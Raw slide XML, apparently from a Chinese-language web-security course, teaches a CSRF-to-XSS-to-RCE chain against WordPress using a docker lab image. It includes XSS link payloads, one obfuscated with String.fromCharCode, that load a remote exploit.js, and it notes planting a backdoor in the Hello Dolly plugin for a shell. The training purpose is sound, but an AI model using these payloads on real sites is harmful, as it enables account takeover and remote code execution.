              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=alert(1) id=" '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>='111'&gt;please click me</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B00A81F-5AE0-FB46-97FE-0986F370E65C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="989406" y="4356454"/>
            <a:ext cx="1534444" cy="3556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原文本</a:t>
            </a:r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8FA3DE0B-6256-9B49-A414-D610E659B1E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="989406" y="5355133"/>
            <a:ext cx="1534444" cy="35562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dirty="0"/>
              <a:t>处理后</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13A844CD-FEC4-3246-875E-1ED164A83EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1756628" y="5821788"/>
            <a:ext cx="9807588" cy="3556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" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&lt;a title=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"Xss" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> =alert(1) id=" " </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>='111'&gt;please click me</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10707812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定义</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>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4800" y="1288604"/>
            <a:ext cx="4945203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CSRF-&gt;XSS-&gt;RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击链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75" y="1244166"/>
            <a:ext cx="444500" cy="444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EF9F0F-ECED-0E44-B0F7-529C8A4FD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954" y="2527299"/>
            <a:ext cx="9029453" cy="282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22609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EBA81A-14FB-D54F-BA16-63ABCB570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02</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSRF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Xss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601747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3409C1B7-10B1-2240-9DAE-3C26A57911E8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032305" y="2344582"/>
            <a:ext cx="10455883" cy="1728654"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker pull registry.cn-shanghai.aliyuncs.com/yhskc/xsstorce:latest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker run -d -p 0.0.0.0:80:80 registry.cn-shanghai.aliyuncs.com/yhskc/xsstorce:latest</a:t>
            </a:r>
          </a:p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6FFC9CA-7667-6647-AD70-B45E7347CC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容器启动</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p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20282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3527975-C7EF-0440-83EE-6CA3462340B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CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>制作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A82611B-CE6E-F340-9263-58F897A46D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67260"/>
            <a:ext cx="12192000" cy="4128152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18271D5D-EB8C-8242-A5B4-A47B45A89077}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6254496" y="5449824"/>
            <a:ext cx="1371600" cy="31089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占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C2254E5-E411-3C46-9B88-AEB68DD5C6AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="310896" y="919468"/>
            <a:ext cx="9807588" cy="35562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2000"/>
              <a:t>登录高权账号评论并截取上传报文，制作</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" sz="2000" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>代码：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&lt;a title=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'Xss " </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=alert(1) id=" '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>='111'&gt;please click me</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2655758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34A2F-763A-3C4B-A53B-7E4D5AAC78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CSRF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5EC59AB-AB62-BE45-9A76-CC2A90EC9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7350" y="1178306"/>
            <a:ext cx="8877300" cy="4025900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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6E551C22-418E-DB4C-9D24-CC602445E0A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2188800" y="3072384"/>
            <a:ext cx="1377360" cy="356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083563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BF3AB2F-C1EA-3A42-A59E-921D52EA19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494" y="1872742"/>
            <a:ext cx="11468100" cy="2755900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6934A2F-763A-3C4B-A53B-7E4D5AAC78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CSRF</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" alt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E551C22-418E-DB4C-9D24-CC602445E0A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7236288" y="3584448"/>
            <a:ext cx="1377360" cy="35661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617219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EBA81A-14FB-D54F-BA16-63ABCB570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01</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 简介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流程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8645913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831145-274F-2349-9EAF-D1E4F83F5D0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CSRF-&gt;Xss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9C6EB31-A573-7A45-AD5F-547EDF93AE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3116" y="1138326"/>
            <a:ext cx="7319172" cy="458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851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EBA81A-14FB-D54F-BA16-63ABCB5701B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kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>03</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 从</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RCE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289699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定义</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>原理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zh-CN" altLang="en-US" dirty="0" err="1"/>
              <a:t>插件利用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Hello_Dolly</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{869795AC-4899-AF4D-BA11-DB5757844F9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405977" y="2948535"/>
            <a:ext cx="9807588" cy="1251886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 err="1"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" err="1"/>
              <a:t>世界上第一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Wordpress </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" err="1"/>
              <a:t>的插件，启用之后，可以在后台的右上角随机显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>《Hello Dolly》</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" err="1"/>
              <a:t>这首歌里面的一句歌词。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>	Wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以使用插件，通过</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>往插件中写入后门完成</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>GetShell</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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332F322-EFAF-4B42-B1CB-46F2E12E27DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1186634" y="5807693"/>
            <a:ext cx="10246273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docker run -d -p 0.0.0.0:82:80 registry.cn-shanghai.aliyuncs.com/yhskc/xsstorce:latest</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="390450555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C3579AF-6F7A-DA41-AC03-F0C0655B943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恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>文件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828A84-FA9C-964F-922D-8FD213C639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7100" y="1263650"/>
            <a:ext cx="7797800" cy="433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265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F92EB04-E9E3-6941-8023-CE89B2E96BD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Exploit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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546AEDC4-F242-AC43-AA11-E84CB77129EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1072553"/>
            <a:ext cx="12192000" cy="20852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0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Alibaba PuHuiTi" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi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" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;a title='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>hacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t> " </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t> s=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>('script');</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>s.setAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>','http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>127.0.0.1:82</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>/exploit.js');</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>s.onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>document.body.appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>(s);" id="' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>123</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>"&gt;Exploit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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93A6EBB-8899-9B4D-8CFE-3DC6723E3F0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="126320" y="2646126"/>
            <a:ext cx="11759184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&lt;a title='hacker " </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>="var s=document.createElement(String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116));s.setAttribute(String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99),String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(49)+String.fromCharCode(50)+String.fromCharCode(55)+String.fromCharCode(46)+String.fromCharCode(48)+String.fromCharCode(46)+String.fromCharCode(48)+String.fromCharCode(46)+String.fromCharCode(49)+String.fromCharCode(58)+String.fromCharCode(56)+String.fromCharCode(50)+String.fromCharCode(47)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(112)+String.fromCharCode(108)+String.fromCharCode(111)+String.fromCharCode(105)+String.fromCharCode(116)+String.fromCharCode(46)+String.fromCharCode(106)+String.fromCharCode(115));s.onload=document.body.appendChild(s);" id="' rel="nofollow"&gt;Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4068759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B2ACB15-24AF-B243-BDD4-F7D3193DB96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CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>利用脚本</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN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E81387-D0D0-EB43-8505-E735DA1CC2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039" y="1351565"/>
            <a:ext cx="8746605" cy="41814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5266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89D12609-EC80-0945-86FD-23BE2BD89403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94B582-1F47-E14E-A3DB-0D74BB812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Exploit</a:t>
            </a:r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FE0F02B-4F1E-264E-8A47-08C39B8C8E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15057"/>
            <a:ext cx="12192000" cy="4535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687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694B582-1F47-E14E-A3DB-0D74BB81257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en-US" altLang="zh-CN"/>
              <a:t>getshell</a:t>
            </a:r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5D1A65-4245-874F-9FCA-606AC45AAD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900" y="2470150"/>
            <a:ext cx="9728200" cy="1917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1165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kumimoji="1" lang="zh-CN" altLang="en-US"/>
              <a:t>复盘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574800" y="1288604"/>
            <a:ext cx="4945203" cy="355624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSRF-&gt;XSS-&gt;RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击链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75" y="1244166"/>
            <a:ext cx="444500" cy="4445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AEF9F0F-ECED-0E44-B0F7-529C8A4FD3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4954" y="2527299"/>
            <a:ext cx="9029453" cy="2824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51059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4C6A-2360-E048-97AF-936385A0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14" y="306601"/>
            <a:ext cx="7852933" cy="557723"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="x-none" sz="3200" dirty="0">
                <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>课后作业</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122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BD0F8A-7223-6D4F-BDE2-67DD467D2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756" r="42434" b="17660"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="481945" y="1117682"/>
            <a:ext cx="2786187" cy="576669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2718D3-CDB0-ED43-920B-FCCA38F85DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481946" y="1117682"/>
            <a:ext cx="2786186" cy="5791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843B4-CE0B-5044-951B-F95D60E3C292}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346480" y="2841544"/>
            <a:ext cx="3100612" cy="21641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990F6B-0A9F-F143-99A8-8BF0649910C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349808" y="3726425"/>
            <a:ext cx="3100612" cy="33855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LET’S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PRACTICE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei UI" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0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F5D6C5-B877-8C42-9661-2954312D2E1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1122363"/>
            <a:ext cx="121920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E8D7C7D-874B-3E46-BF54-19B86075F06E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5101888" y="3696667"/>
            <a:ext cx="681946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/>
              <a:t>根据提供的内容完成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>CSRF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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>链的攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Freeform 1669">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{789BDFC4-93AC-5B46-AFDD-EF4D65AD18AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4289880" y="3690518"/>
            <a:ext cx="406648" cy="406648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Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78116627-3876-DF40-B3DF-797D7BBB5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CD723B5E-F49C-42B4-B84C-579B3F105F1D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98807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原理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/>
              <a:t>WordPress</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US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673FC5-5D6E-2243-BBE7-ADC0999026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5335" y="2817812"/>
            <a:ext cx="7721092" cy="1222375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
